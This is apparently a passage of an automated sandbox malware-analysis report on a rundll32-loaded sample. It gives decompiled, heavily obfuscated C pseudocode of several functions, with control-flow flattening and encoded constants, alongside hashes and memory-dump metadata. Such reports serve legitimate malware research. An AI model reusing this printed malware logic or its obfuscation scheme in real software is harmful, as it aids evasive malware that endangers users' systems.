                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <]$GL$NjZ$T$j_$s\}k
                                                                                                                      • API String ID: 0-1588241565
                                                                                                                      • Opcode ID: 499a0ecee60bc66d7e3dea55dc7964683aacb2df158788c9d08bf5d0311fe53c
                                                                                                                      • Instruction ID: 8f12228d631e4c0957f31ab323ae0e7c1531ed8b817da2c6f98d4f5273081031
                                                                                                                      • Opcode Fuzzy Hash: 499a0ecee60bc66d7e3dea55dc7964683aacb2df158788c9d08bf5d0311fe53c
                                                                                                                      • Instruction Fuzzy Hash: 6BC100724083419FC368CF25C58A94BFBE5FBC4748F008A1EF5A99A260D7B59A19CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B70ED Relevance: 7.7, Strings: 6, Instructions: 219COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002B70ED() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _t202;
				signed int _t203;
				void* _t204;
				intOrPtr _t209;
				intOrPtr _t216;
				void* _t218;
				intOrPtr _t224;
				intOrPtr _t236;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t246;
				signed int* _t248;
				void* _t251;

				_t248 =  &_v612;
				_v540 = 0xdad4cc;
				_v540 = _v540 ^ 0x94191629;
				_t218 = 0x6f2f9f8;
				_v540 = _v540 ^ 0x94c3c2f9;
				_v544 = 0x76e0f0;
				_v544 = _v544 << 0x10;
				_v544 = _v544 ^ 0xe0f00029;
				_v536 = 0x3bc67a;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x000f0383;
				_v568 = 0x8bde3b;
				_v568 = _v568 + 0xffff2322;
				_v568 = _v568 ^ 0x008d993e;
				_v596 = 0x92619;
				_v596 = _v596 ^ 0xd159791b;
				_v596 = _v596 + 0xffff3449;
				_v596 = _v596 | 0x988058a4;
				_v596 = _v596 ^ 0xd9ccc0e1;
				_v608 = 0xa06713;
				_t241 = 0x29;
				_v608 = _v608 / _t241;
				_v608 = _v608 ^ 0x6a345d45;
				_t246 = 0;
				_v608 = _v608 << 0xe;
				_v608 = _v608 ^ 0xed3298df;
				_v576 = 0x1c835f;
				_v576 = _v576 ^ 0xdf607740;
				_v576 = _v576 >> 0xb;
				_v576 = _v576 ^ 0x0012ec93;
				_v584 = 0x7ddda5;
				_t242 = 0x76;
				_v584 = _v584 / _t242;
				_v584 = _v584 | 0x464a7126;
				_v584 = _v584 ^ 0x4642215f;
				_v548 = 0x20374d;
				_t243 = 0x71;
				_v548 = _v548 * 0x6c;
				_v548 = _v548 ^ 0x0d9d239d;
				_v528 = 0x9116;
				_v528 = _v528 ^ 0x0b2a50da;
				_v528 = _v528 ^ 0x0b2b7a92;
				_v600 = 0xee9b3a;
				_v600 = _v600 | 0x1ae7cac3;
				_v600 = _v600 + 0x2aec;
				_v600 = _v600 | 0xe5d5fb71;
				_v600 = _v600 ^ 0xfffe899a;
				_v556 = 0x2fd7b1;
				_v556 = _v556 / _t243;
				_v556 = _v556 ^ 0x0001ae08;
				_v552 = 0xd06bd7;
				_v552 = _v552 + 0x9aba;
				_v552 = _v552 ^ 0x00dba68b;
				_v560 = 0x3f6698;
				_v560 = _v560 ^ 0x9e976c20;
				_v560 = _v560 ^ 0x9ea088a0;
				_v564 = 0xf04caf;
				_v564 = _v564 << 0xc;
				_v564 = _v564 ^ 0x04c86801;
				_v532 = 0x4abe1e;
				_v532 = _v532 + 0xffff7e54;
				_v532 = _v532 ^ 0x0047677c;
				_v592 = 0xfc3d76;
				_v592 = _v592 >> 4;
				_t244 = 0x67;
				_t245 = _v524;
				_v592 = _v592 / _t244;
				_v592 = _v592 ^ 0x0e63bcd1;
				_v592 = _v592 ^ 0x0e6c0c0a;
				_v580 = 0x87074e;
				_v580 = _v580 + 0x3b8f;
				_v580 = _v580 + 0xffffa265;
				_v580 = _v580 ^ 0x008cb1a6;
				_v588 = 0xe717aa;
				_v588 = _v588 | 0xfff18f7b;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x001226f1;
				_v604 = 0x61f630;
				_v604 = _v604 | 0xec5f2186;
				_v604 = _v604 ^ 0x97c62f9e;
				_v604 = _v604 ^ 0x80f94e8c;
				_v604 = _v604 ^ 0xfb4d53d4;
				_v612 = 0x890e92;
				_v612 = _v612 >> 9;
				_v612 = _v612 + 0xf9d4;
				_v612 = _v612 + 0xffff7e3c;
				_v612 = _v612 ^ 0x000167a4;
				_v572 = 0xa3f922;
				_v572 = _v572 << 1;
				_v572 = _v572 + 0x9b39;
				_v572 = _v572 ^ 0x014464a5;
				goto L1;
				do {
					while(1) {
						L1:
						_t251 = _t218 - 0xaf66d96;
						if(_t251 > 0) {
							break;
						}
						if(_t251 == 0) {
							_push(_t218);
							_t236 =  *0x2d520c; // 0x0
							_t203 = E002BEA7B(_t236 + 8, _v552, _v524, _t218, _v560, _v564, _v532);
							_t248 =  &(_t248[7]);
							_t218 = 0xbcbad55;
							__eflags = _t203;
							_t204 = 1;
							_t246 =  ==  ? _t204 : _t246;
							continue;
						}
						if(_t218 == 0x1700698) {
							E002CE689(_v548, _v528, _v600, _t245, _v556);
							_t248 =  &(_t248[3]);
							L9:
							_t218 = 0xaf66d96;
							continue;
						}
						if(_t218 == 0x4f7449d) {
							_v524 = _v540;
							goto L9;
						}
						if(_t218 == 0x51416c3) {
							E002D12A8(_t218, _v592, __eflags, _v580, _v588,  &_v520);
							_t209 = E002B7677( &_v520, _v604, _v612, _v572);
							_t224 =  *0x2d520c; // 0x0
							 *((intOrPtr*)(_t224 + 4)) = _t209;
							L23:
							return _t246;
						}
						if(_t218 != 0x6f2f9f8) {
							goto L20;
						}
						_push(_t218);
						_push(_t218);
						 *0x2d520c = E002C3512(0x444);
						_t218 = 0xcc58939;
					}
					__eflags = _t218 - 0xbcbad55;
					if(_t218 == 0xbcbad55) {
						E002BE86A();
						_t218 = 0x51416c3;
						goto L20;
					}
					__eflags = _t218 - 0xcc58939;
					if(_t218 == 0xcc58939) {
						_t202 = E002BEB36(_v576, _v584, _t218, _v536);
						_t245 = _t202;
						_t248 =  &(_t248[3]);
						__eflags = _t202;
						if(__eflags == 0) {
							_t218 = 0x4f7449d;
						} else {
							_t216 =  *0x2d520c; // 0x0
							 *((intOrPtr*)(_t216 + 0x438)) = 1;
							_t218 = 0xdbc7fda;
						}
						goto L1;
					}
					__eflags = _t218 - 0xdbc7fda;
					if(__eflags != 0) {
						goto L20;
					}
					_t218 = 0x1700698;
					_v524 = _v544;
					goto L1;
					L20:
					__eflags = _t218 - 0xee3620e;
				} while (__eflags != 0);
				goto L23;
			}










































                                                                                                                      0x002b70ed
                                                                                                                      0x002b70f3
                                                                                                                      0x002b70fd
                                                                                                                      0x002b7105
                                                                                                                      0x002b710a
                                                                                                                      0x002b7112
                                                                                                                      0x002b711a
                                                                                                                      0x002b711f
                                                                                                                      0x002b7127
                                                                                                                      0x002b712f
                                                                                                                      0x002b7134
                                                                                                                      0x002b713c
                                                                                                                      0x002b7144
                                                                                                                      0x002b714c
                                                                                                                      0x002b7154
                                                                                                                      0x002b715c
                                                                                                                      0x002b7164
                                                                                                                      0x002b716c
                                                                                                                      0x002b7174
                                                                                                                      0x002b717c
                                                                                                                      0x002b718e
                                                                                                                      0x002b7193
                                                                                                                      0x002b7199
                                                                                                                      0x002b71a1
                                                                                                                      0x002b71a3
                                                                                                                      0x002b71a8
                                                                                                                      0x002b71b0
                                                                                                                      0x002b71b8
                                                                                                                      0x002b71c0
                                                                                                                      0x002b71c5
                                                                                                                      0x002b71cd
                                                                                                                      0x002b71d9
                                                                                                                      0x002b71de
                                                                                                                      0x002b71e4
                                                                                                                      0x002b71ec
                                                                                                                      0x002b71f4
                                                                                                                      0x002b7201
                                                                                                                      0x002b7202
                                                                                                                      0x002b7206
                                                                                                                      0x002b720e
                                                                                                                      0x002b7216
                                                                                                                      0x002b721e
                                                                                                                      0x002b7226
                                                                                                                      0x002b722e
                                                                                                                      0x002b7236
                                                                                                                      0x002b723e
                                                                                                                      0x002b7246
                                                                                                                      0x002b724e
                                                                                                                      0x002b725c
                                                                                                                      0x002b7260
                                                                                                                      0x002b7268
                                                                                                                      0x002b7270
                                                                                                                      0x002b7278
                                                                                                                      0x002b7280
                                                                                                                      0x002b7288
                                                                                                                      0x002b7290
                                                                                                                      0x002b7298
                                                                                                                      0x002b72a0
                                                                                                                      0x002b72a5
                                                                                                                      0x002b72ad
                                                                                                                      0x002b72b5
                                                                                                                      0x002b72bd
                                                                                                                      0x002b72c5
                                                                                                                      0x002b72cd
                                                                                                                      0x002b72df
                                                                                                                      0x002b72e2
                                                                                                                      0x002b72eb
                                                                                                                      0x002b72ef
                                                                                                                      0x002b72f7
                                                                                                                      0x002b72ff
                                                                                                                      0x002b7307
                                                                                                                      0x002b730f
                                                                                                                      0x002b7317
                                                                                                                      0x002b731f
                                                                                                                      0x002b7327
                                                                                                                      0x002b732f
                                                                                                                      0x002b7334
                                                                                                                      0x002b733c
                                                                                                                      0x002b7344
                                                                                                                      0x002b734c
                                                                                                                      0x002b7354
                                                                                                                      0x002b735c
                                                                                                                      0x002b7364
                                                                                                                      0x002b736c
                                                                                                                      0x002b7371
                                                                                                                      0x002b7379
                                                                                                                      0x002b7381
                                                                                                                      0x002b7389
                                                                                                                      0x002b7391
                                                                                                                      0x002b7395
                                                                                                                      0x002b739d
                                                                                                                      0x002b739d
                                                                                                                      0x002b73a5
                                                                                                                      0x002b73a5
                                                                                                                      0x002b73a5
                                                                                                                      0x002b73a5
                                                                                                                      0x002b73a7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b73ad
                                                                                                                      0x002b7420
                                                                                                                      0x002b7436
                                                                                                                      0x002b743f
                                                                                                                      0x002b7444
                                                                                                                      0x002b7447
                                                                                                                      0x002b744c
                                                                                                                      0x002b7450
                                                                                                                      0x002b7451
                                                                                                                      0x00000000
                                                                                                                      0x002b7451
                                                                                                                      0x002b73b5
                                                                                                                      0x002b7416
                                                                                                                      0x002b741b
                                                                                                                      0x002b7401
                                                                                                                      0x002b7401
                                                                                                                      0x00000000
                                                                                                                      0x002b7401
                                                                                                                      0x002b73b9
                                                                                                                      0x002b73fd
                                                                                                                      0x00000000
                                                                                                                      0x002b73fd
                                                                                                                      0x002b73c1
                                                                                                                      0x002b74e6
                                                                                                                      0x002b74fb
                                                                                                                      0x002b7500
                                                                                                                      0x002b7509
                                                                                                                      0x002b750d
                                                                                                                      0x002b7518
                                                                                                                      0x002b7518
                                                                                                                      0x002b73cd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b73df
                                                                                                                      0x002b73e0
                                                                                                                      0x002b73ed
                                                                                                                      0x002b73f2
                                                                                                                      0x002b73f2
                                                                                                                      0x002b7459
                                                                                                                      0x002b745f
                                                                                                                      0x002b74bd
                                                                                                                      0x002b74c2
                                                                                                                      0x00000000
                                                                                                                      0x002b74c2
                                                                                                                      0x002b7461
                                                                                                                      0x002b7467
                                                                                                                      0x002b7490
                                                                                                                      0x002b7495
                                                                                                                      0x002b7497
                                                                                                                      0x002b749a
                                                                                                                      0x002b749c
                                                                                                                      0x002b74b6
                                                                                                                      0x002b749e
                                                                                                                      0x002b749e
                                                                                                                      0x002b74a6
                                                                                                                      0x002b74ac
                                                                                                                      0x002b74ac
                                                                                                                      0x00000000
                                                                                                                      0x002b749c
                                                                                                                      0x002b7469
                                                                                                                      0x002b746f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b7475
                                                                                                                      0x002b747a
                                                                                                                      0x00000000
                                                                                                                      0x002b74c7
                                                                                                                      0x002b74c7
                                                                                                                      0x002b74c7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$E]4j$M7 $_!BF$|gG$*
                                                                                                                      • API String ID: 0-1206799572
                                                                                                                      • Opcode ID: fcfa03accf3d88584f1528a28b7a9071c010fb7d31a9c24e35ddf28cb198b838
                                                                                                                      • Instruction ID: 9ead860e971d484dce6d88550e31fbab2d7cacdd03259a0f19a3f1539143978a
                                                                                                                      • Opcode Fuzzy Hash: fcfa03accf3d88584f1528a28b7a9071c010fb7d31a9c24e35ddf28cb198b838
                                                                                                                      • Instruction Fuzzy Hash: C2A120B152C3819FD768CF24D48A85BBBF1FBC5398F20891DF69686260C3B18959CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C5040 Relevance: 7.7, Strings: 6, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E002C5040(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t222;
				signed int _t224;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t261;
				void* _t262;
				signed int* _t264;
				signed int* _t265;

				_t264 =  &_v80;
				_v64 = 0xca2d1a;
				_v64 = _v64 + 0xffff463a;
				_v64 = _v64 + 0xffffa2b5;
				_v64 = _v64 + 0xffffe441;
				_v64 = _v64 ^ 0x00ce8887;
				_v68 = 0xe757b6;
				_t261 = __edx;
				_t227 = __ecx;
				_t262 = 0xd46e588;
				_t229 = 0x7b;
				_v68 = _v68 / _t229;
				_v68 = _v68 | 0x2f3c6c23;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0xe7b70971;
				_v72 = 0xa66d67;
				_v72 = _v72 + 0xffff9e81;
				_v72 = _v72 + 0xffffa01d;
				_v72 = _v72 + 0xd858;
				_v72 = _v72 ^ 0x00aeb203;
				_v76 = 0xda65d9;
				_v76 = _v76 | 0x06c15440;
				_v76 = _v76 + 0x3ac0;
				_t230 = 0x31;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x9dbea6d5;
				_v28 = 0xef7021;
				_v28 = _v28 + 0xc1df;
				_v28 = _v28 ^ 0x38dac4ec;
				_v28 = _v28 ^ 0x38291ca9;
				_v56 = 0xd77e5;
				_v56 = _v56 | 0x9f6ff94e;
				_v56 = _v56 / _t230;
				_v56 = _v56 ^ 0x034debba;
				_v32 = 0x5c0433;
				_t231 = 0x4c;
				_v32 = _v32 / _t231;
				_t232 = 0x38;
				_v32 = _v32 * 9;
				_v32 = _v32 ^ 0x000ec3b0;
				_v60 = 0x6ca766;
				_v60 = _v60 + 0x1f13;
				_v60 = _v60 * 0x1b;
				_v60 = _v60 << 0xb;
				_v60 = _v60 ^ 0xc778512f;
				_v12 = 0x6aa94;
				_v12 = _v12 + 0x5212;
				_v12 = _v12 ^ 0x000734b5;
				_v48 = 0xd6268c;
				_v48 = _v48 / _t232;
				_t233 = 0x26;
				_v48 = _v48 / _t233;
				_v48 = _v48 + 0x646;
				_v48 = _v48 ^ 0x000e3e3b;
				_v52 = 0x57df31;
				_t234 = 0x5e;
				_v52 = _v52 / _t234;
				_v52 = _v52 >> 4;
				_v52 = _v52 << 0x10;
				_v52 = _v52 ^ 0x0ef79a5c;
				_v8 = 0x5569b0;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x000ef288;
				_v44 = 0x5fa9ce;
				_v44 = _v44 + 0xffff7bdd;
				_v44 = _v44 << 1;
				_t235 = 0x65;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x000c777c;
				_v36 = 0x515ebf;
				_v36 = _v36 | 0x64797e59;
				_v36 = _v36 ^ 0x4915d5d4;
				_v36 = _v36 ^ 0x2d62d183;
				_v16 = 0xf90c33;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 ^ 0x1c3bb4ce;
				_v80 = 0x303e6a;
				_v80 = _v80 + 0xaf21;
				_v80 = _v80 ^ 0x45872c25;
				_v80 = _v80 + 0xffff3867;
				_v80 = _v80 ^ 0x45bdee21;
				_v20 = 0xb8b4ba;
				_v20 = _v20 + 0x3a99;
				_v20 = _v20 ^ 0x00b083c3;
				_v40 = 0xb582c8;
				_v40 = _v40 + 0x432d;
				_v40 = _v40 | 0xfff7ef9a;
				_v40 = _v40 ^ 0xfff9a351;
				_v24 = 0x3e85d;
				_v24 = _v24 * 0x1b;
				_v24 = _v24 + 0xffffd227;
				_v24 = _v24 ^ 0x006c1bcc;
				_v4 = 0x28c504;
				_v4 = _v4 + 0xffffee75;
				_v4 = _v4 ^ 0x002a9648;
				do {
					while(_t262 != 0x8d90b87) {
						if(_t262 == 0x991fac7) {
							return E002BF88A(_v40, _v24, _v4,  *(_t261 + 0x30));
						}
						if(_t262 == 0xa3f1429) {
							_push(_t235);
							_t224 = E002C8D71(_v64, _v68, __eflags, _v72, _v76, _t227);
							_t265 =  &(_t264[4]);
							 *(_t261 + 0x30) = _t224;
							__eflags = _t224;
							if(_t224 != 0) {
								E002BEE05(_v56, _v32, _v60, _t224, _t224);
								_t235 =  *(_t261 + 0x30);
								E002CE713(_t235, _v12, _v48, _v52);
								_t264 =  &(_t265[6]);
								_t262 = 0x8d90b87;
								continue;
							}
						} else {
							if(_t262 == 0xd46e588) {
								_t262 = 0xa3f1429;
								continue;
							} else {
								if(_t262 != 0xf9322b8) {
									goto L14;
								} else {
									_t235 = E002B2F34;
									_t224 = E002C4EFF(E002B2F34, _v36, E002B2F34, E002B2F34, _v16, _v80, E002B2F34, _v20, _t261);
									_t264 =  &(_t264[8]);
									 *(_t261 + 0x24) = _t224;
									if(_t224 == 0) {
										_t262 = 0x991fac7;
										continue;
									}
								}
							}
						}
						return _t224;
						L18:
					}
					_t235 = _v8;
					_t222 = E002C2BDE(_t235,  *(_t261 + 0x30), _v44);
					_t264 =  &(_t264[1]);
					 *(_t261 + 0xc) = _t222;
					__eflags = _t222;
					if(__eflags == 0) {
						_t262 = 0x991fac7;
						goto L14;
					} else {
						_t262 = 0xf9322b8;
						continue;
					}
					goto L18;
					L14:
					__eflags = _t262 - 0x74fce14;
				} while (__eflags != 0);
				return _t224;
			}





































                                                                                                                      0x002c5040
                                                                                                                      0x002c5043
                                                                                                                      0x002c504b
                                                                                                                      0x002c5053
                                                                                                                      0x002c505b
                                                                                                                      0x002c5063
                                                                                                                      0x002c506b
                                                                                                                      0x002c507b
                                                                                                                      0x002c507d
                                                                                                                      0x002c5083
                                                                                                                      0x002c5088
                                                                                                                      0x002c508d
                                                                                                                      0x002c5093
                                                                                                                      0x002c509b
                                                                                                                      0x002c50a0
                                                                                                                      0x002c50a8
                                                                                                                      0x002c50b0
                                                                                                                      0x002c50b8
                                                                                                                      0x002c50c0
                                                                                                                      0x002c50c8
                                                                                                                      0x002c50d0
                                                                                                                      0x002c50d8
                                                                                                                      0x002c50e0
                                                                                                                      0x002c50ed
                                                                                                                      0x002c50f0
                                                                                                                      0x002c50f4
                                                                                                                      0x002c50fc
                                                                                                                      0x002c5104
                                                                                                                      0x002c510c
                                                                                                                      0x002c5114
                                                                                                                      0x002c511c
                                                                                                                      0x002c5124
                                                                                                                      0x002c5134
                                                                                                                      0x002c5138
                                                                                                                      0x002c5140
                                                                                                                      0x002c514c
                                                                                                                      0x002c5151
                                                                                                                      0x002c515c
                                                                                                                      0x002c515f
                                                                                                                      0x002c5163
                                                                                                                      0x002c516b
                                                                                                                      0x002c5173
                                                                                                                      0x002c5180
                                                                                                                      0x002c5184
                                                                                                                      0x002c5189
                                                                                                                      0x002c5191
                                                                                                                      0x002c5199
                                                                                                                      0x002c51a1
                                                                                                                      0x002c51a9
                                                                                                                      0x002c51b9
                                                                                                                      0x002c51c1
                                                                                                                      0x002c51c4
                                                                                                                      0x002c51c8
                                                                                                                      0x002c51d0
                                                                                                                      0x002c51d8
                                                                                                                      0x002c51e8
                                                                                                                      0x002c51ed
                                                                                                                      0x002c51f3
                                                                                                                      0x002c51fd
                                                                                                                      0x002c5202
                                                                                                                      0x002c520a
                                                                                                                      0x002c5212
                                                                                                                      0x002c5217
                                                                                                                      0x002c521f
                                                                                                                      0x002c5227
                                                                                                                      0x002c522f
                                                                                                                      0x002c5237
                                                                                                                      0x002c523a
                                                                                                                      0x002c523e
                                                                                                                      0x002c5246
                                                                                                                      0x002c524e
                                                                                                                      0x002c5256
                                                                                                                      0x002c525e
                                                                                                                      0x002c5266
                                                                                                                      0x002c5273
                                                                                                                      0x002c5277
                                                                                                                      0x002c527f
                                                                                                                      0x002c5287
                                                                                                                      0x002c528f
                                                                                                                      0x002c5297
                                                                                                                      0x002c529f
                                                                                                                      0x002c52a7
                                                                                                                      0x002c52af
                                                                                                                      0x002c52b7
                                                                                                                      0x002c52bf
                                                                                                                      0x002c52c7
                                                                                                                      0x002c52cf
                                                                                                                      0x002c52d7
                                                                                                                      0x002c52df
                                                                                                                      0x002c52ec
                                                                                                                      0x002c52f0
                                                                                                                      0x002c52f8
                                                                                                                      0x002c5300
                                                                                                                      0x002c5308
                                                                                                                      0x002c5310
                                                                                                                      0x002c5318
                                                                                                                      0x002c5318
                                                                                                                      0x002c5326
                                                                                                                      0x00000000
                                                                                                                      0x002c5425
                                                                                                                      0x002c5332
                                                                                                                      0x002c537f
                                                                                                                      0x002c5391
                                                                                                                      0x002c5396
                                                                                                                      0x002c5399
                                                                                                                      0x002c539c
                                                                                                                      0x002c539e
                                                                                                                      0x002c53b6
                                                                                                                      0x002c53c7
                                                                                                                      0x002c53ca
                                                                                                                      0x002c53cf
                                                                                                                      0x002c53d2
                                                                                                                      0x00000000
                                                                                                                      0x002c53d2
                                                                                                                      0x002c5334
                                                                                                                      0x002c533a
                                                                                                                      0x002c5378
                                                                                                                      0x00000000
                                                                                                                      0x002c533c
                                                                                                                      0x002c5342
                                                                                                                      0x00000000
                                                                                                                      0x002c5348
                                                                                                                      0x002c535c
                                                                                                                      0x002c5361
                                                                                                                      0x002c5366
                                                                                                                      0x002c5369
                                                                                                                      0x002c536e
                                                                                                                      0x002c5374
                                                                                                                      0x00000000
                                                                                                                      0x002c5374
                                                                                                                      0x002c536e
                                                                                                                      0x002c5342
                                                                                                                      0x002c533a
                                                                                                                      0x002c542d
                                                                                                                      0x00000000
                                                                                                                      0x002c542d
                                                                                                                      0x002c53e3
                                                                                                                      0x002c53e7
                                                                                                                      0x002c53ec
                                                                                                                      0x002c53ef
                                                                                                                      0x002c53f2
                                                                                                                      0x002c53f4
                                                                                                                      0x002c5400
                                                                                                                      0x00000000
                                                                                                                      0x002c53f6
                                                                                                                      0x002c53f6
                                                                                                                      0x00000000
                                                                                                                      0x002c53f6
                                                                                                                      0x00000000
                                                                                                                      0x002c5402
                                                                                                                      0x002c5402
                                                                                                                      0x002c5402
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !p$#l</$-C$Y~yd$j>0$w
                                                                                                                      • API String ID: 0-1896768906
                                                                                                                      • Opcode ID: 457e01b4b2d249e3f0b47c816cbea6e1a24d4a218a92b6a82084fa0b15282e13
                                                                                                                      • Instruction ID: 903b4111f1d1f32f0888aad38ca0ab4d1df131e8ce774babf3dca416d94936e0
                                                                                                                      • Opcode Fuzzy Hash: 457e01b4b2d249e3f0b47c816cbea6e1a24d4a218a92b6a82084fa0b15282e13
                                                                                                                      • Instruction Fuzzy Hash: 12A17571818781AFD358CF24C88991BFBF1BBC4398F408A1DF59696260D7B1D9598F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2579439406-0
                                                                                                                      • Opcode ID: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction ID: 507c20c1e61512489ef28f25289f4d37d9bc9ee57db3d69d2177bc050be51aa9
                                                                                                                      • Opcode Fuzzy Hash: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction Fuzzy Hash: 3D21FFB4801320CFFB11DF28EDC56483BA4FB88315F10206AE50D87A71EBB16680AF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C2BF6 Relevance: 6.7, Strings: 5, Instructions: 409COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002C2BF6() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* _t442;
				intOrPtr _t446;
				intOrPtr _t448;
				signed int _t458;
				signed int _t460;
				void* _t461;
				void* _t492;
				signed int _t502;
				intOrPtr _t503;
				intOrPtr* _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
